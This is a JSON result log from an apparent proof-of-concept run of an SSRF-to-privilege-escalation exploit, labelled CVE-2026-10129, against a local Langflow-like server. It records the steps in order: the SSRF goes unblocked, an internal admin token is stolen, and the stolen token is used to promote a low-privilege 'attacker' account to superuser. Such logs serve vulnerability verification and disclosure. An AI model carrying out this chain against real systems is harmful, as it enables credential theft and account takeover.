{"base": "http://127.0.0.1:7860", "name": "cve-2026-10129-ssrf-privesc", "login_status": 200, "auth_mode": "bearer", "attacker_whoami_status_before": 200, "attacker_user_id": "a4905877-7864-4a57-83ee-d3f1d43da8b3", "attacker_is_superuser_before": false, "lowpriv_admin_list_status_before": 403, "lowpriv_admin_list_body_before": "{\"detail\":\"The user doesn't have enough privileges\"}", "flow_id": "dd8ad255-2f23-41b8-a6a9-3fa7f0394731", "build_status": 200, "events_bytes": 11771, "marker_found": true, "ssrf_blocked": false, "reached_internal": true, "stolen_admin_token_found": true, "stolen_admin_token_redacted": "eyJhbGciOiJIUzI1Ni...aXvi0D0U", "stolen_token_whoami_status": 200, "stolen_token_username": "admin", "stolen_token_is_superuser": true, "stolen_token_admin_list_status": 200, "stolen_token_admin_list_total": 2, "promote_attacker_status": 200, "promote_attacker_body": "{\"id\":\"a4905877-7864-4a57-83ee-d3f1d43da8b3\",\"username\":\"attacker\",\"profile_image\":null,\"store_api_key\":null,\"is_active\":true,\"is_superuser\":true,\"create_at\":\"2026-07-05T09:39:24.922983\",\"updated_at\":\"2026-07-05T09:39:31.773298Z\",\"last_login_at\":\"2026-07-05T09:39:30.699549\",\"optins\":{\"github_starred\":false,\"dialog_dismissed\":false,\"discord_clicked\":false}}", "attacker_whoami_status_after": 200, "attacker_is_superuser_after": true, "privilege_escalation_observed": true, "snippet": "9999/admin-token\", \"status_code\": 302}], \"result\": {\"service\": \"internal-admin\", \"endpoint\": \"/admin-token\", \"secret\": \"INTERNAL_ADMIN_TOKEN_CVE_2026_10129\", \"credential_type\": \"langflow_admin_bearer_token\", \"access_token\": \"eyJhbGciOiJIUzI1Ni...aXvi0D0U\", \"token_subj"}
